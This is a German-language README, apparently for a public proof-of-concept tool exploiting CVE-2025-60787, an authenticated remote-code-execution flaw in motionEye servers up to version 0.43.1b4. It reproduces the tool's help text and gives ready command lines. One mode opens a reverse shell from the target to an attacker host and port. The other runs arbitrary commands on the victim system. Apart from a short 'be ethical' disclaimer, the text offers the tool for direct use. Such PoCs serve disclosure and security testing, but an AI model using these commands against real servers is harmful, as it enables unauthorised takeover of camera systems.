
Automatisierter PoC für CVE-2025-60787, der authentifizierte Remote-Codeausführung gegen motionEye-Server bis Version 0.43.1b4 ermöglicht, mit Reverse-Shell- und Befehlsausführungsmodi.
PoC für CVE-2025-60787, eine authentifizierte RCE-Schwachstelle für motionEye mit allen betroffenen Versionen bis einschließlich 0.43.1b4.
Dies ist ein automatisierter PoC für die in diesem Repository beschriebene Schwachstelle. Credits an prabhatverma47.
Das Skript hat 2 Befehle, die die Schwachstelle ausnutzen. Einer sendet direkt eine Reverse Shell namens revshell und ein anderer Befehl namens command führt direkt Befehle unter Ausnutzung dieser CVE aus.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
Verwenden Sie den Befehl revshell, um eine Shell zu erhalten. Zum Beispiel:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
Wobei 10.10.10.10 das Zielsystem ist (das System, auf dem motionEye läuft), 10.10.10.15 unser Angreifer-System und 9001 der Port, auf dem wir lauschen, um eine Reverse Shell zu empfangen.
Wenn wir anstelle einer Reverse Shell andere Befehle remote ausführen möchten, können wir die Option command verwenden. Zum Beispiel den Befehl ping -c1 10.10.10.15 auf dem Opfer-System ausführen:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
Wobei 10.10.10.10 das System ist, auf dem motionEye läuft.
Verwenden Sie dieses Skript stets in eigener Verantwortung.
Seien Sie ethisch (: